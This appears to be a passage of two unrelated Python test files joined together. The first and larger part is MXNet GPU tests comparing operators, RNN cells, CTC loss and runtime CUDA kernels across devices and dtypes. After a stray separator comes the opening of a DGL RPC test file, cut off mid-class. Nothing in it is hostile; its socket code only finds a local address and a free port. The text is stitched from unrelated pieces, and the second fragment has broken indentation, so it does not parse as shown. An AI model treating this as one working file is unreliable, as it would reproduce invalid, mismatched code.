    ctx_list = [{'ctx': dev, 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
                 'type_dict': {'concat_arg0': dtype, 'concat_arg1': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
    """ElementWiseSum consistency for 1..5 inputs over several dtypes and devices."""
    dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
                 [mx.cpu(0), [np.float64, np.float32]]]
    for num_args in range(1, 6):
        # All inputs share the same (2, 10) shape.
        arg_shapes = {'ews_arg' + str(i): (2, 10) for i in range(num_args)}
        sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
        ctx_list = []
        for dev, dtypes in dev_types:
            for dtype in dtypes:
                entry = {'ctx': dev}
                entry.update(arg_shapes)
                entry['type_dict'] = {'ews_arg' + str(i): dtype for i in range(num_args)}
                ctx_list.append(entry)
        check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
    """Reshape dtype consistency across devices."""
    sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
    """BlockGrad dtype consistency across devices."""
    sym = mx.sym.BlockGrad(name='bg')
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
    """SwapAxis dtype consistency across devices."""
    sym = mx.sym.SwapAxis(name='swap', dim1=1)
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
    """FullyConnected dtype consistency, plus a TensorCore-friendly fp16 case."""
    sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32)]
    ctx_list = [{'ctx': dev, 'inner_data': (2, 10), 'type_dict': {'inner_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
    # Sizes are divisible by 8 to test TensorCore on Volta GPU.
    sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
    ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
                {'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
    check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
    """Sigmoid Activation dtype consistency across devices (incl. CPU fp16)."""
    sym = mx.sym.Activation(name='act', act_type='sigmoid')
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32), (mx.cpu(0), np.float16)]
    ctx_list = [{'ctx': dev, 'act_data': (2, 2, 10, 10), 'type_dict': {'act_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
    """LRN CPU/GPU consistency at fp32."""
    sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
    ctx_list = [{'ctx': dev, 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}
                for dev in (mx.gpu(0), mx.cpu(0))]
    check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
    """Embedding consistency over data/weight dtype combinations and padded indices."""
    def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
        # (N, V, D) = (batch, vocabulary size, embedding dim).
        for N, V, D in ([20, 10, 20], [200, 10, 300]):
            sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
            ctx_list = [{'ctx': dev, 'embedding_data': (N,),
                         'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}
                        for data_type in data_types
                        for weight_type in weight_types
                        for dev in (mx.gpu(0), mx.cpu(0))]
            # Indices deliberately range outside [0, V) by low_pad/high_pad.
            arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V + high_pad, size=(N,))}
            check_consistency(sym, ctx_list,
                              grad_req={'embedding_data': 'null', 'embedding_weight': 'write'},
                              arg_params=arg_params)

    float_weight_types = [np.float16, np.float32, np.float64]
    # Signed data types can index below zero; uint8 can only overflow upward.
    test_embedding_helper([np.float16, np.float32, np.float64, np.int32], float_weight_types, 5, 5)
    test_embedding_helper([np.uint8], float_weight_types, 0, 5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
    """SVMOutput (linear) dtype consistency across devices."""
    sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
    cases = [(mx.gpu(0), np.float64), (mx.gpu(0), np.float32), (mx.gpu(0), np.float16),
             (mx.cpu(0), np.float64), (mx.cpu(0), np.float32), (mx.cpu(0), np.float16)]
    ctx_list = [{'ctx': dev, 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': dtype}}
                for dev, dtype in cases]
    check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
    """take() dtype consistency over random data/index shapes on CPU and GPU."""
    sym = mx.sym.take(name='take')
    for data_ndim in range(2, 5):
        for idx_ndim in range(1, 4):
            # Draw shapes with the same RNG call sequence as before (data first,
            # then indices) so the seeded randomness is unchanged.
            data_shape = tuple(np.random.randint(low=3, high=6) for _ in range(data_ndim))
            idx_shape = tuple(np.random.randint(low=3, high=5) for _ in range(idx_ndim))
            ctx_list = [{'ctx': dev,
                         'take_indices': idx_shape,
                         'take_a': data_shape,
                         'type_dict': {'take_indices': dtype, 'take_a': dtype}}
                        for dev in (mx.gpu(0), mx.cpu(0))
                        for dtype in (np.float64, np.float32, np.float16)]
            arg_params = {'take_indices': np.random.randint(low=0,
                                                            high=data_shape[0],
                                                            size=idx_shape),
                          'take_a': np.random.normal(size=data_shape)}
            check_consistency(sym, ctx_list,
                              grad_req={'take_indices': 'null',
                                        'take_a': 'write'},
                              arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
    """Unroll both cells over 5 steps on identical weights and compare outputs.

    cell1's parameters are initialized, translated into cell2's layout via
    unpack/pack, and both modules are run forward on the same random batch.
    """
    dshape = (32, 5, 200)
    data = mx.sym.Variable('data')

    def build_module(cell):
        # One bound (not yet initialized) module per cell, built in call order.
        unrolled, _ = cell.unroll(5, data, merge_outputs=True)
        mod = mx.mod.Module(unrolled, label_names=None, context=mx.gpu(0))
        mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
        return mod

    mod1 = build_module(cell1)
    mod2 = build_module(cell2)

    mod1.init_params()
    args, auxs = mod1.get_params()
    # Translate cell1's parameter layout into the layout cell2 expects.
    args = cell2.pack_weights(cell1.unpack_weights(args))
    mod2.set_params(args, auxs)

    batch = mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
    mod1.forward(batch, is_train=False)
    mod2.forward(batch, is_train=False)

    assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(),
                    rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
    """Fused relu-RNN vs. a two-layer stack of RNNCells, in both directions."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l%d_' % layer))
    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
    """Fused LSTM vs. a two-layer stack of LSTMCells, in both directions."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.LSTMCell(100, prefix='l%d_' % layer))
    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
    """FusedRNNCell must initialize each LSTM forget-gate bias to forget_bias."""
    forget_bias = 2.0
    fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')

    dshape = (32, 1, 20)
    sym, _ = fused.unroll(1, mx.sym.Variable('data'), merge_outputs=True)

    mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
    mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
    mod.init_params()

    args, _ = mod.get_params()
    args = fused.unpack_weights(args)
    # Any forget-gate bias will do; unpacked names end with 'f_bias'.
    bias_name = next(name for name in args if name.endswith('f_bias'))
    assert_allclose(args[bias_name].asnumpy(), forget_bias * np.ones(10, ))
@with_seed()
def test_gru():
    """Fused GRU vs. a two-layer stack of GRUCells, in both directions."""
    fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.GRUCell(100, prefix='l%d_' % layer))
    check_rnn_consistency(fused, stack)
    check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
    # A bidirectional fused GRU must match a stack of BidirectionalCells
    # built from unfused GRUCells (forward 'l*' and reverse 'r*' prefixes).
    fused_cell = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
                                     bidirectional=True)
    stacked_cell = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stacked_cell.add(mx.rnn.BidirectionalCell(
            mx.rnn.GRUCell(100, prefix='l%d_' % layer),
            mx.rnn.GRUCell(100, prefix='r%d_' % layer),
            output_prefix='bi_gru_%d_' % layer))
    check_rnn_consistency(fused_cell, stacked_cell)
    check_rnn_consistency(stacked_cell, fused_cell)
@with_seed()
def test_unfuse():
    # FusedRNNCell.unfuse() must yield an equivalent unfused stack for every
    # supported mode, including bidirectional layers with dropout.
    for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
        fused_cell = mx.rnn.FusedRNNCell(
            100, num_layers=2, mode=mode,
            prefix='test_%s' % mode,
            bidirectional=True,
            dropout=0.5)
        unfused_stack = fused_cell.unfuse()
        check_rnn_consistency(fused_cell, unfused_stack)
        check_rnn_consistency(unfused_stack, fused_cell)
@with_seed(1234)
def test_psroipooling_with_type():
    # Fixed ROIs so each dtype run pools identical regions.
    arg_params = {
        'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}

    # plain psroipooling
    sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
    # One GPU context entry per dtype; the shapes are shared.
    ctx_list = [{'ctx': mx.gpu(0),
                 'psroipool_data': (1, 18, 14, 14),
                 'psroipool_rois': (2, 5),
                 'type_dict': {'psroipool_data': dtype, 'psroipool_rois': dtype}}
                for dtype in [np.float64, np.float32, np.float16]]

    check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
                                               'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
    # Fixed ROIs so each dtype run pools identical regions.
    arg_params = {
        'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}

    # deformable psroipooling
    sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
                                                output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
    # One GPU context entry per dtype; the shapes are shared.
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_psroipool_data': (1, 18, 14, 14),
                 'deformable_psroipool_rois': (2, 5),
                 'deformable_psroipool_trans': (2, 4, 3, 3),
                 'type_dict': {'deformable_psroipool_data': dtype,
                               'deformable_psroipool_rois': dtype,
                               'deformable_psroipool_trans': dtype}}
                for dtype in [np.float64, np.float32, np.float16]]

    check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
                                               'deformable_psroipool_rois': 'null',
                                               'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
    # since atomicAdd does not support fp16 (which deformable conv uses in
    # backward), fp16 is deliberately excluded from the dtype sweep.
    ctx_list = [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 10, 10),
                 'deformable_conv_offset': (2, 18, 8, 8),
                 'type_dict': {'deformable_conv_data': dtype, 'deformable_conv_offset': dtype}}
                for dtype in [np.float64, np.float32]]
    # wider tolerance needed for true-fp16 NCHW test above
    tol = {np.dtype(np.float16): 0.5,
           np.dtype(np.float32): 1e-3,
           np.dtype(np.float64): 1e-5,
           np.dtype(np.uint8): 0,
           np.dtype(np.int32): 0}
    check_consistency(sym, ctx_list, tol=tol)
    # test ability to turn off training on bias
    check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
                                               'deformable_conv_offset': 'write',
                                               'deformable_conv_weight': 'write',
                                               'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
    """Check deformable convolution GPU consistency for several operator
    options: padding, stride, dilation and deformable groups.

    since atomicAdd does not support fp16 (which deformable conv uses in
    backward), we do not test fp16 here.
    """
    def _make_ctx_list(offset_shape):
        # One GPU context entry per dtype; only the offset shape varies
        # between the option cases below.
        return [{'ctx': mx.gpu(0),
                 'deformable_conv_data': (2, 2, 7, 7),
                 'deformable_conv_offset': offset_shape,
                 'type_dict': {'deformable_conv_data': dtype, 'deformable_conv_offset': dtype}}
                for dtype in [np.float64, np.float32]]

    # Pad > 0
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
    check_consistency(sym, _make_ctx_list((2, 18, 7, 7)))

    # Stride > 1
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
    check_consistency(sym, _make_ctx_list((2, 18, 3, 3)))

    # Dilate > 1
    sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
    check_consistency(sym, _make_ctx_list((2, 18, 3, 3)))

    # Deformable group > 1
    sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
                                               name='deformable_conv')
    # BUG FIX: the original built this symbol and its ctx_list but never ran
    # the consistency check, so the deformable-group case was never tested.
    check_consistency(sym, _make_ctx_list((2, 36, 5, 5)))
@with_seed()
def test_residual_fused():
    # ResidualCell adds the input to the wrapped RNN's output. With all RNN
    # parameters forced to zero the recurrent contribution vanishes, so the
    # output must equal the all-6s input exactly.
    cell = mx.rnn.ResidualCell(
            mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
                                prefix='rnn_', dropout=0.5))

    inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
    outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
    # The fused cell packs all weights into a single parameter blob.
    assert sorted(cell.params._params.keys()) == \
           ['rnn_parameters']

    args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
    assert outs == [(10, 2, 50)]
    # 61200 is the flattened parameter count of this 3-layer LSTM
    # (presumably — derived from infer_shape; confirm if the cell config changes).
    outputs = outputs.eval(ctx=mx.gpu(0),
                           rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
                           rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
                           rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
    expected_outputs = np.ones((10, 2, 50))+5
    assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
    # Run the same gluon recurrent layer on GPU and CPU with identical
    # all-ones input and compare outputs and final states.
    layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
    with mx.gpu(0):
        gpu_input = mx.nd.ones((10, 16, 30))
        gpu_out, gpu_states = layer(gpu_input, layer.begin_state(16))
    with mx.cpu(0):
        cpu_input = mx.nd.ones((10, 16, 30))
        cpu_out, cpu_states = layer(cpu_input, layer.begin_state(16))

    # atol of 1e-6 required, as exposed by seed 2124685726
    assert_almost_equal(gpu_out.asnumpy(), cpu_out.asnumpy(), rtol=1e-2, atol=1e-6)
    for gpu_state, cpu_state in zip(gpu_states, cpu_states):
        assert_almost_equal(gpu_state.asnumpy(), cpu_state.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
    # Like check_rnn_layer, but a single random input is copied to both
    # devices so GPU and CPU see identical data.
    layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
    sample = mx.nd.uniform(shape=(10, 16, 30))
    with mx.gpu(0):
        gpu_out, gpu_states = layer(sample.copyto(mx.gpu(0)), layer.begin_state(16))
    with mx.cpu(0):
        cpu_out, cpu_states = layer(sample.copyto(mx.cpu(0)), layer.begin_state(16))

    assert_almost_equal(gpu_out.asnumpy(), cpu_out.asnumpy(), rtol=1e-2, atol=1e-6)
    for gpu_state, cpu_state in zip(gpu_states, cpu_states):
        assert_almost_equal(gpu_state.asnumpy(), cpu_state.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
    # Every gluon recurrent layer type must agree between CPU and GPU; the
    # bidirectional LSTM is additionally checked with random inputs.
    layers = [
        gluon.rnn.RNN(100, num_layers=3),
        gluon.rnn.RNN(100, activation='tanh', num_layers=3),
        gluon.rnn.LSTM(100, num_layers=3),
        gluon.rnn.GRU(100, num_layers=3),
        gluon.rnn.LSTM(100, num_layers=3, bidirectional=True),
    ]
    for layer in layers:
        check_rnn_layer(layer)
    check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
    # Reuse the shared sequence-reverse checker on the GPU context.
    check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
    # Rebinding x inside a recorded scope builds a 200-step graph over a
    # large (128, 512, 512) GPU buffer; backward must complete without
    # exhausting GPU memory.
    x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
    x.attach_grad()
    with mx.autograd.record():
        for i in range(200):
            x = x + 1
            # Force each step to materialize before recording the next.
            x.wait_to_read()
    x.backward()
@with_seed()
def test_gluon_ctc_consistency():
    # CTC loss gradients must match between CPU and GPU for identical
    # inputs; -1 entries in the label arrays are padding.
    loss = mx.gluon.loss.CTCLoss()
    data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
    cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
    gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))

    # CPU pass.
    cpu_data = data.copy().as_in_context(mx.cpu(0))
    cpu_data.attach_grad()
    with mx.autograd.record():
        l_cpu = loss(cpu_data, cpu_label)
        l_cpu.backward()

    # GPU pass on a copy of the same data.
    gpu_data = data.copyto(mx.gpu(0))
    gpu_data.attach_grad()
    with mx.autograd.record():
        l_gpu = loss(gpu_data, gpu_label)
        l_gpu.backward()

    assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
    # Compile two tiny kernels at runtime via mx.rtc and verify their effect:
    # axpy does y += alpha*x directly; saxpy does the same but staged through
    # dynamically-sized shared memory.
    source = r'''
    extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
        int i = threadIdx.x + blockIdx.x * blockDim.x;
        y[i] += alpha * x[i];
    }

    extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
        extern __shared__ float smem[];
        int i = threadIdx.x + blockIdx.x * blockDim.x;
        smem[threadIdx.x] = x[i];
        y[i] += alpha * smem[threadIdx.x];
    }
    '''
    module = mx.rtc.CudaModule(source)
    axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
    x = mx.nd.ones((10,), ctx=mx.gpu(0))
    y = mx.nd.zeros((10,), ctx=mx.gpu(0))
    axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
    assert (y.asnumpy() == 3).all()  # 0 + 3*1

    saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
    # Trailing launch argument sets the dynamic shared-memory size
    # (presumably bytes — TODO confirm against mx.rtc docs).
    saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
    assert (y.asnumpy() == 7).all()  # 3 + 4*1

    # Same kernel split across two blocks of five threads.
    saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
    assert (y.asnumpy() == 12).all()  # 7 + 5*1
@with_seed()
def test_global_norm_clip_multi_device():
    # Gradients live on different devices; the global L2 norm of the two
    # all-ones arrays is sqrt(9 + 16) = 5, so clipping to 1.0 rescales every
    # array by 1/5.
    grad_gpu = mx.nd.ones((3, 3), ctx=mx.gpu(0))
    grad_cpu = mx.nd.ones((4, 4), ctx=mx.cpu(0))
    norm = gluon.utils.clip_global_norm([grad_gpu, grad_cpu], 1.0)
    assert norm == 5.0
    assert_almost_equal(grad_gpu.asnumpy(), np.ones((3, 3)) / 5)
    assert_almost_equal(grad_cpu.asnumpy(), np.ones((4, 4)) / 5)
@with_seed()
def test_cross_device_autograd():
    # Autograd must track gradients across device transfers: tanh chained
    # through cpu->gpu->cpu->gpu hops must produce the same dx as the pure
    # single-device tanh chain below.
    x = mx.nd.random.uniform(shape=(10,))
    x.attach_grad()
    with mx.autograd.record():
        y = mx.nd.tanh(x)
        y = y.copyto(mx.gpu(0))
        y = mx.nd.tanh(y)
        y = y.copyto(mx.cpu(0))
        y = mx.nd.tanh(y)
        y = y.copyto(mx.gpu(0))
        # A copy onto the same device must also be recorded correctly.
        y = y.copyto(mx.gpu(0))
    y.backward()

    dx = x.grad.asnumpy()
    x.grad[:] = 0

    # Reference: three tanh applications without any device hops.
    with mx.autograd.record():
        y = x
        for i in range(3):
            y = mx.nd.tanh(y)
    y.backward()

    assert_almost_equal(dx, x.grad.asnumpy())
@unittest.skip("JIRA issue: https://issues.apache.org/jira/projects/MXNET/issues/MXNET-130")
@with_seed()
def test_multi_proposal_op():
    # CPU and GPU implementations of (Multi)Proposal must produce the same
    # ROIs and scores for identical random RPN inputs.
    # paramters
    feature_stride = 16
    scales = (8, 16, 32)
    ratios = (0.5, 1, 2)
    rpn_pre_nms_top_n = 12000
    rpn_post_nms_top_n = 2000
    threshold = 0.7
    rpn_min_size = feature_stride

    feat_len = (1000 + 15) // 16
    H, W = feat_len, feat_len
    num_anchors = len(scales) * len(ratios)
    count_anchors = H * W * num_anchors

    def get_new_data(batch_size, ctx):
        '''
        cls_prob: (batch_size, 2 * num_anchors, H, W)
        bbox_pred: (batch_size, 4 * num_anchors, H, W)
        im_info: (batch_size, 3)
        '''
        dtype = np.float32
        cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
        bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
        im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)

        # Distinct, shuffled scores so ranking/NMS order is well defined.
        cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
        np.random.shuffle(cls)
        cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
        bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)

        # Random image sizes/scales per batch element.
        for i in range(batch_size):
            im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
            im_scale = np.random.randint(80, 100) / 100.0
            im_info[i, :] = [im_size[0], im_size[1], im_scale]
        return cls_prob, bbox_pred, im_info

    def check_proposal_consistency(op, batch_size):
        '''
        op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
        '''
        cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
        rois_cpu, score_cpu = op(
                cls_score = cls_prob,
                bbox_pred = bbox_pred,
                im_info = im_info,
                feature_stride = feature_stride,
                scales = scales,
                ratios = ratios,
                rpn_pre_nms_top_n = rpn_pre_nms_top_n,
                rpn_post_nms_top_n = rpn_post_nms_top_n,
                threshold = threshold,
                rpn_min_size = rpn_min_size, output_score = True)

        gpu_ctx = mx.gpu(0)

        # copy data to gpu from cpu
        cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
        bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
        im_info_gpu = im_info.as_in_context(gpu_ctx)

        rois_gpu, score_gpu = op(
                cls_score = cls_prob_gpu,
                bbox_pred = bbox_pred_gpu,
                im_info = im_info_gpu,
                feature_stride = feature_stride,
                scales = scales,
                ratios = ratios,
                rpn_pre_nms_top_n = rpn_pre_nms_top_n,
                rpn_post_nms_top_n = rpn_post_nms_top_n,
                threshold = threshold,
                rpn_min_size = rpn_min_size, output_score = True)

        rois_cpu_np = rois_cpu.asnumpy()
        rois_gpu_np = rois_gpu.asnumpy()

        score_cpu_np = score_cpu.asnumpy()
        score_gpu_np = score_gpu.asnumpy()

        assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
        assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)

    check_proposal_consistency(mx.nd.contrib.Proposal, 1)
    check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
    # Dividing by an empty array launches a 0-thread kernel; with the naive
    # engine the resulting CUDA error surfaces synchronously.
    os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
    numerator = mx.nd.array([1,2,3],ctx=mx.gpu(0))
    empty = mx.nd.array([],ctx=mx.gpu(0))
    (numerator / empty).asnumpy()
def kernel_error_check_symbolic():
    # Symbolic variant of the 0-thread kernel launch: bind a/b with an empty
    # divisor and force evaluation with asnumpy().
    os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
    lhs = mx.sym.Variable('a')
    rhs = mx.sym.Variable('b')
    quotient = lhs / rhs
    executor = quotient.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
                                          'b':mx.nd.array([],ctx=mx.gpu(0))})
    executor.forward()
    executor.outputs[0].asnumpy()
def test_kernel_error_checking():
    # Running tests that may throw exceptions out of worker threads will stop CI testing
    # if not run in a separate process (with its own address space for CUDA compatibility).
    try:
        mpctx = mp.get_context('spawn')
    except:
        print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
              sys.version_info[0:2], file=sys.stderr, end='')
    else:
        with discard_stderr():
            for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
                p = mpctx.Process(target=f)
                p.start()
                p.join()
                # A failed CUDA launch must abort the child with a nonzero
                # exit code.
                assert p.exitcode != 0,\
                    "Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
    # Try setting dev_id to a really big number: allocation must raise
    # MXNetError rather than silently succeed.
    bad_device_id = 100001
    assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(bad_device_id))
if __name__ == '__main__':
    # Allow running this test file directly through nose.
    import nose
    nose.runmodule()
|
test_rpc.py | import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
# Shared fixtures for the RPC round-trip tests below.
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231  # arbitrary unique id for the hello service
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
    """Get local usable IP and port.

    Returns
    -------
    str
        IP address and a free TCP port separated by a space,
        e.g., '192.168.8.12 50051'.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable: connecting a UDP socket only
        # selects the outgoing interface, no packet is sent
        sock.connect(('10.255.255.255', 1))
        ip_addr = sock.getsockname()[0]
    except (ValueError, OSError):
        # FIX: socket.connect raises OSError (not ValueError) when the host
        # has no usable route; fall back to loopback in either case.
        ip_addr = '127.0.0.1'
    finally:
        sock.close()

    # Bind to port 0 so the OS picks a currently-free TCP port, then release
    # it for the caller to use.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("", 0))
    sock.listen(1)
    port = sock.getsockname()[1]
    sock.close()

    return ip_addr + ' ' + str(port)
def foo(x, y):
    # Sanity callback shipped inside MyRequest: verifies that both payload
    # values survived (de)serialization unchanged.
    assert x == 123
    assert y == "abc"
class MyRequest(dgl.distributed.Request):
